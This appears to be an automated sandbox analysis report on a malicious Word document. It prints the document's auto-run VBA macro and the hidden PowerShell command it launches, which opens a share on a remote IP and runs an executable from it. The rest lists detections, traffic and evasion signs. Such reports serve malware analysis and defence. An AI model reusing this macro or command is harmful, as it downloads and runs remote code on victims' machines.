Windows Analysis Report
Ham9SAD0Ou.doc

Overview

General Information

Sample name: Ham9SAD0Ou.doc (renamed because the original name is a hash value)
Original sample name: 6005516d783bde80a25763acbb85230b.docx.doc
Analysis ID: 1540325
MD5: 6005516d783bde80a25763acbb85230b
SHA1: e7a231af0530a09066717d3c1fcd340e215e83d9
SHA256: edfc124678400137fbe36333ef1114ebd69dd7448f88c02eb68825a3392773fc
Tags: doc, docx, user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (process start blacklist hit)
Machine Learning detection for dropped file
Machine Learning detection for sample
Opens network shares
Sigma detected: Suspicious Microsoft Office Child Process
Suspicious powershell command line found
AV process strings found (often used to terminate AV products)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 3404 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • powershell.exe (PID: 3496 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -c "explorer '\\89.23.98.98@80\file\'; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\89.23.98.98@80\file\Putty.exe" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
      • explorer.exe (PID: 3616 cmdline: "C:\Windows\explorer.exe" \\89.23.98.98@80\file\ MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
  • explorer.exe (PID: 3668 cmdline: explorer.exe MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -c "explorer '\\89.23.98.98@80\file\'; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\89.23.98.98@80\file\Putty.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -c "explorer '\\89.23.98.98@80\file\'; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\89.23.98.98@80\file\Putty.exe", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 3404, ParentProcessName: WINWORD.EXE, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -c "explorer '\\89.23.98.98@80\file\'; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\89.23.98.98@80\file\Putty.exe", ProcessId: 3496, ProcessName: powershell.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -c "explorer '\\89.23.98.98@80\file\'; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\89.23.98.98@80\file\Putty.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -c "explorer '\\89.23.98.98@80\file\'; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\89.23.98.98@80\file\Putty.exe", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 3404, ParentProcessName: WINWORD.EXE, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -c "explorer '\\89.23.98.98@80\file\'; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\89.23.98.98@80\file\Putty.exe", ProcessId: 3496, ProcessName: powershell.exe
Source: File created | Author: Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3404, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3496, TargetFilename: C:\Users\user\AppData\Local\Temp\jtfthxgk.dkd.ps1
No Suricata rule has matched

AV Detection

Source: Ham9SAD0Ou.doc | Avira: detected
Source: C:\Users\user\Desktop\~WRD0000.tmp | Avira: detection malicious, Label: HEUR/Macro.Downloader.MRSY.Gen
Source: Ham9SAD0Ou.doc | ReversingLabs: Detection: 42%
Source: C:\Users\user\Desktop\~WRD0000.tmp | Joe Sandbox ML: detected
Source: Ham9SAD0Ou.doc | Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: .pdb | source: powershell.exe, 00000002.00000002.392522585.000000001BB63000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 89.23.98.98:80
Source: global traffic | TCP traffic: 89.23.98.98:80 -> 192.168.2.22:49163
Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 89.23.98.98:80
Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 89.23.98.98:80
Source: global traffic | TCP traffic: 89.23.98.98:80 -> 192.168.2.22:49163
Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 89.23.98.98:80

Networking

Source: C:\Windows\explorer.exe | Network Connect: 89.23.98.98 80
Source: Joe Sandbox View | ASN Name: MAXITEL-ASRU MAXITEL-ASRU
Source: unknown | TCP traffic detected without corresponding DNS query: 89.23.98.98
Source: unknown | TCP traffic detected without corresponding DNS query: 89.23.98.98
Source: unknown | TCP traffic detected without corresponding DNS query: 89.23.98.98
Source: unknown | TCP traffic detected without corresponding DNS query: 89.23.98.98
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{5C96A7A8-2E90-4086-A586-FD55B96AEBCA}.tmp
Source: explorer.exe, 00000004.00000002.380623964.000000000020B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.380623964.00000000001FC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://89.23.98.98/
Source: explorer.exe, 00000005.00000002.1091711614.00000000002CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://java.sun.com
Source: powershell.exe, 00000002.00000002.389315931.0000000012B61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.385717407.0000000002B31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000005.00000002.1091711614.00000000002CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 00000005.00000002.1092043382.0000000003CD0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.piriform.com
Source: explorer.exe, 00000005.00000002.1092043382.0000000003CD0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.piriform.com/cc
Source: explorer.exe, 00000005.00000002.1091711614.000000000034A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.1092394208.00000000062B0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.1091885223.0000000002600000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000002.00000002.382279546.000000000033E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.1092394208.00000000062B0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.1091885223.0000000002600000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000005.00000002.1091711614.000000000034A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerm
Source: explorer.exe, 00000005.00000002.1092043382.0000000003CD0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerv
Source: powershell.exe, 00000002.00000002.389315931.0000000012B61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.389315931.0000000012B61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.389315931.0000000012B61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.389315931.0000000012B61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: explorer.exe, 00000005.00000002.1091711614.00000000002CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000005.00000002.1091711614.00000000002CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000005.00000002.1091711614.00000000002CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes

System Summary

Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function Document_Open, API IWshShell3.Run("powershell.exe -WindowStyle Hidden -c "explorer '\\89.23.98.98@80\file\'; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\89.23.98.98@80\file\Putty.exe"",1:Integer,True) | Name: Document_Open
Source: ~WRD0000.tmp.0.dr | OLE, VBA macro line: JbxHook_Run_3__ob = jbxthis.Run(jbxparam0, jbxparam1, jbxparam2)
Source: Ham9SAD0Ou.doc | OLE, VBA macro line: Set objShell = CreateObject("WScript.Shell")
Source: Ham9SAD0Ou.doc | OLE, VBA macro line: strCommand = "powershell.exe -WindowStyle Hidden -c ""explorer '\\89.23.98.98@80\file\'; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\89.23.98.98@80\file\Putty.exe"""
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function Document_Open, String wscript: Set objShell = CreateObject("WScript.Shell") | Name: Document_Open
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function Document_Open, String powershell: strCommand = "powershell.exe -WindowStyle Hidden -c ""explorer '\\89.23.98.98@80\file\'; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\89.23.98.98@80\file\Putty.exe""" | Name: Document_Open
Source: ~WRD0000.tmp.0.dr | OLE, VBA macro line: strCommand = "powershell.exe -WindowStyle Hidden -c ""explorer '\\89.23.98.98@80\file\'; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\89.23.98.98@80\file\Putty.exe"""
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_000007FE89DD329A
Source: Ham9SAD0Ou.doc | OLE, VBA macro line: Sub Document_Open()
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function Document_Open | Name: Document_Open
Source: ~WRD0000.tmp.0.dr | OLE, VBA macro line: Sub Document_Open()
Source: Ham9SAD0Ou.doc | OLE indicator, VBA macros: true
Source: ~WRD0000.tmp.0.dr | OLE indicator, VBA macros: true
Source: ~WRF{3A14B1C6-5901-4E7D-84B7-8F898608CC14}.tmp.0.dr | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: classification engine | Classification label: mal100.spyw.expl.evad.winDOC@6/15@0/1
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$m9SAD0Ou.doc
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVR9839.tmp
Source: Ham9SAD0Ou.doc | OLE indicator, Word Document stream: true
Source: ~WRD0000.tmp.0.dr | OLE indicator, Word Document stream: true
Source: Ham9SAD0Ou.doc | OLE document summary: title field not present or empty
Source: Ham9SAD0Ou.doc | OLE document summary: edited time not present or 0
Source: ~WRF{3A14B1C6-5901-4E7D-84B7-8F898608CC14}.tmp.0.dr | OLE document summary: title field not present or empty
Source: ~WRF{3A14B1C6-5901-4E7D-84B7-8F898608CC14}.tmp.0.dr | OLE document summary: author field not present or empty
Source: ~WRF{3A14B1C6-5901-4E7D-84B7-8F898608CC14}.tmp.0.dr | OLE document summary: edited time not present or 0
Source: ~WRD0000.tmp.0.dr | OLE document summary: title field not present or empty
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: "The network path was not found"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: "At line:1 char:89"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\explorer.exe
Source: unknown | Process created: C:\Windows\explorer.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\explorer.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
Source: C:\Windows\explorer.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: Ham9SAD0Ou.doc | ReversingLabs: Detection: 42%
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -c "explorer '\\89.23.98.98@80\file\'; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\89.23.98.98@80\file\Putty.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" \\89.23.98.98@80\file\
Source: unknown | Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -c "explorer '\\89.23.98.98@80\file\'; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\89.23.98.98@80\file\Putty.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" \\89.23.98.98@80\file\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\explorer.exe | Section loaded: explorerframe.dll
Source: C:\Windows\explorer.exe | Section loaded: duser.dll
Source: C:\Windows\explorer.exe | Section loaded: dui70.dll
Source: C:\Windows\explorer.exe | Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe | Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe | Section loaded: dwmapi.dll
Source: C:\Windows\explorer.exe | Section loaded: slc.dll
Source: C:\Windows\explorer.exe | Section loaded: secur32.dll
Source: C:\Windows\explorer.exe | Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe | Section loaded: propsys.dll
Source: C:\Windows\explorer.exe | Section loaded: winsta.dll
Source: C:\Windows\explorer.exe | Section loaded: cryptbase.dll
Source: C:\Windows\explorer.exe | Section loaded: apphelp.dll
Source: C:\Windows\explorer.exe | Section loaded: mpr.dll
Source: C:\Windows\explorer.exe | Section loaded: davhlpr.dll
Source: C:\Windows\explorer.exe | Section loaded: netutils.dll
Source: C:\Windows\explorer.exe | Section loaded: cscapi.dll
Source: C:\Windows\explorer.exe | Section loaded: srvcli.dll
Source: C:\Windows\explorer.exe | Section loaded: winhttp.dll
Source: C:\Windows\explorer.exe | Section loaded: webio.dll
Source: C:\Windows\explorer.exe | Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe | Section loaded: credssp.dll
Source: C:\Windows\explorer.exe | Section loaded: version.dll
Source: C:\Windows\explorer.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe | Section loaded: winnsi.dll
Source: C:\Windows\explorer.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\explorer.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\explorer.exe | Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\explorer.exe | Section loaded: explorerframe.dll
Source: C:\Windows\explorer.exe | Section loaded: duser.dll
Source: C:\Windows\explorer.exe | Section loaded: dui70.dll
Source: C:\Windows\explorer.exe | Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe | Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe | Section loaded: dwmapi.dll
Source: C:\Windows\explorer.exe | Section loaded: slc.dll
Source: C:\Windows\explorer.exe | Section loaded: secur32.dll
Source: C:\Windows\explorer.exe | Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe | Section loaded: propsys.dll
Source: C:\Windows\explorer.exe | Section loaded: winsta.dll
Source: C:\Windows\explorer.exe | Section loaded: cryptbase.dll
Source: C:\Windows\explorer.exe | Section loaded: windowscodecs.dll
Source: C:\Windows\explorer.exe | Section loaded: apphelp.dll
Source: C:\Windows\explorer.exe | Section loaded: cscdll.dll
Source: C:\Windows\explorer.exe | Section loaded: cscapi.dll
Source: C:\Windows\explorer.exe | Section loaded: srvcli.dll
Source: C:\Windows\explorer.exe | Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe | Section loaded: rpcrtremote.dll
Source: C:\Windows\explorer.exe | Section loaded: sndvolsso.dll
Source: C:\Windows\explorer.exe | Section loaded: hid.dll
Source: C:\Windows\explorer.exe | Section loaded: atl.dll
Source: C:\Windows\explorer.exe | Section loaded: ntmarta.dll
Source: C:\Windows\explorer.exe | Section loaded: linkinfo.dll
Source: C:\Windows\explorer.exe | Section loaded: xmllite.dll
Source: C:\Windows\explorer.exe | Section loaded: wer.dll
Source: C:\Windows\explorer.exe | Section loaded: msiltcfg.dll
Source: C:\Windows\explorer.exe | Section loaded: version.dll
Source: C:\Windows\explorer.exe | Section loaded: msi.dll
Source: C:\Windows\explorer.exe | Section loaded: samcli.dll
Source: C:\Windows\explorer.exe | Section loaded: samlib.dll
Source: C:\Windows\explorer.exe | Section loaded: netutils.dll
Source: C:\Windows\explorer.exe | Section loaded: msftedit.dll
Source: C:\Windows\explorer.exe | Section loaded: msls31.dll
Source: C:\Windows\explorer.exe | Section loaded: cryptui.dll
Source: C:\Windows\explorer.exe | Section loaded: winmm.dll
Source: C:\Windows\explorer.exe | Section loaded: ksuser.dll
Source: C:\Windows\explorer.exe | Section loaded: avrt.dll
Source: C:\Windows\explorer.exe | Section loaded: audioses.dll
Source: C:\Windows\explorer.exe | Section loaded: msacm32.dll
Source: C:\Windows\explorer.exe | Section loaded: midimap.dll
Source: C:\Windows\explorer.exe | Section loaded: mpr.dll
Source: C:\Windows\explorer.exe | Section loaded: davhlpr.dll
Source: C:\Windows\explorer.exe | Section loaded: wkscli.dll
Source: C:\Windows\explorer.exe | Section loaded: batmeter.dll
Source: C:\Windows\explorer.exe | Section loaded: wtsapi32.dll
Source: C:\Windows\explorer.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe | Section loaded: winnsi.dll
Source: C:\Windows\explorer.exe | Section loaded: nlaapi.dll
Source: C:\Windows\explorer.exe | Section loaded: qutil.dll
Source: C:\Windows\explorer.exe | Section loaded: wevtapi.dll
Source: C:\Windows\explorer.exe | Section loaded: winhttp.dll
Source: C:\Windows\explorer.exe | Section loaded: webio.dll
Source: C:\Windows\explorer.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\explorer.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\explorer.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\explorer.exe | Section loaded: credssp.dll
Source: C:\Windows\explorer.exe | Section loaded: wlanapi.dll
Source: C:\Windows\explorer.exe | Section loaded: wlanutil.dll
Source: C:\Windows\explorer.exe | Section loaded: wwapi.dll
Source: C:\Windows\explorer.exe | Section loaded: webcheck.dll
Source: C:\Windows\explorer.exe | Section loaded: ieframe.dll
Source: C:\Windows\explorer.exe | Section loaded: wscapi.dll
Source: C:\Windows\explorer.exe | Section loaded: framedynos.dll
Source: C:\Windows\explorer.exe | Section loaded: wercplsupport.dll
Source: C:\Windows\explorer.exe | Section loaded: bcrypt.dll
Source: C:\Windows\explorer.exe | Section loaded: fxsst.dll
Source: C:\Windows\explorer.exe | Section loaded: fxsapi.dll
Source: C:\Windows\explorer.exe | Section loaded: mfplat.dll
Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\InProcServer32
Source: Ham9SAD0Ou.LNK.0.dr | LNK file: ..\..\..\..\..\Desktop\Ham9SAD0Ou.doc
Source: C:\Windows\explorer.exe | File opened: C:\Windows\system32\MsftEdit.dll
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: Ham9SAD0Ou.doc | Initial sample: OLE summary template = fwd.dotm
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: .pdb | source: powershell.exe, 00000002.00000002.392522585.000000001BB63000.00000004.00000020.00020000.00000000.sdmp
Source: ~WRF{3A14B1C6-5901-4E7D-84B7-8F898608CC14}.tmp.0.dr | Initial sample: OLE indicators vbamacros = False

Data Obfuscation

barindex
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -c "explorer '\\89.23.98.98@80\file\'; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\89.23.98.98@80\file\Putty.exe"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -c "explorer '\\89.23.98.98@80\file\'; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\89.23.98.98@80\file\Putty.exe"Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE -- Process information set: NOOPENFILEERRORBOX (11 identical entries)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE -- Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX (82 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Process information set: NOOPENFILEERRORBOX (63 identical entries)
Source: C:\Windows\explorer.exe -- Process information set: NOOPENFILEERRORBOX (15 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Thread delayed: delay time: 922337203685477 (2 entries; 922337203685477 is Int64.MaxValue / 10000, i.e. TimeSpan.MaxValue in milliseconds, an indefinite wait rather than a chosen delay)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Window / User API: threadDelayed 5773
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Window / User API: threadDelayed 2653
Source: C:\Windows\explorer.exe -- Window / User API: foregroundWindowGot 1397
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3612 -- Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3632 -- Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3556 -- Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 3696 -- Thread sleep time: -1560000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Thread delayed: delay time: 922337203685477 (2 entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
